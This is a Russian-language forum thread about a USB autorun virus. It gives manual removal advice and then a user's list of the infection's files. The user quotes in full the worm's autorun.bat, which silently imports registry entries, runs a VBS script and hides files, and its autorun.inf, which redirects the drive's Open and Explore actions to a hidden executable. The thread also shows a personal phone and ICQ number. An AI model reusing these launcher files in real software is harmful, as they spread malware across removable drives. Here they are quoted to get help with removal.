[TC] Открытие локальных дисков

Здравствуйте, Рафис. А еще у вашего знакомого в контекстном меню, наверное, появились,
странные пункты. Если это так, то есть два пути. Вы либо установите антивирус
(насколько я знаю, ни один из антивирусов кроме nod32 этого вируса не знает)
и он вам все удалит, либо вручную. Сначала включаете отображение скрытых и системных
файлов. Потом следуете в папку
C:\WINDOWS\system32
и находите там вручную все файлы с разными расширениями, называющиеся autorun
и удаляете их, не смотря на крики системы о том, что вы, дескать, можете о том
пожалеть. Далее изучаете корневые каталоги всех локальных дисков на наличие аналогичного
комплекта файлов и столь же безжалостно их искореняете. Не забудьте также проверить
все флешки и плееры, карточки и фтоаппараты, подключавшиеся к этому компьютеру.
И будет вам хорошо. С глубоким уважеием и пожеланиями успехов на поле брани с
вирусяками, Денис, г. Харьков.
Здравствуйте, Denis.
такое чудо повергло не только знакомого рафиса, но и мои компьютеры на
работе. специально принес для исследования на флешке следующие файлы,
которые кстати я намеренно не копировал:
1. папка recycler содержит файл autorun.exe
2. autorun.bat, текст:
echo off
rem autorunIз
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
3. autorun.bin
4. autorun.exe
5. autorun.exe.exe
6. autorun.fcb
7. autorun.ico
8. autorun.inf, текст:
[autorun]
open=
shell\open=Eт(&O)
shell\open\Command=RECYCLER\autorun.exe -OpenCurDir
shell\open\Default=1
shell\explore=ЧКФEЬАнЖч(&X)
shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir
9. autorun.ini
10. autorun.srm
11. autorun.reg
12. autorun.txt
13. autorun.vbs
14. autorun.wsh
так вот наконец имею и я вопрос:
сколь опасен подобный вирус?
кто с ним сталкивался и что он делает?
das_in***@m*****.ru
das_in***@m*****.kg
Icq 331894252
моб. тел: +996 555 448111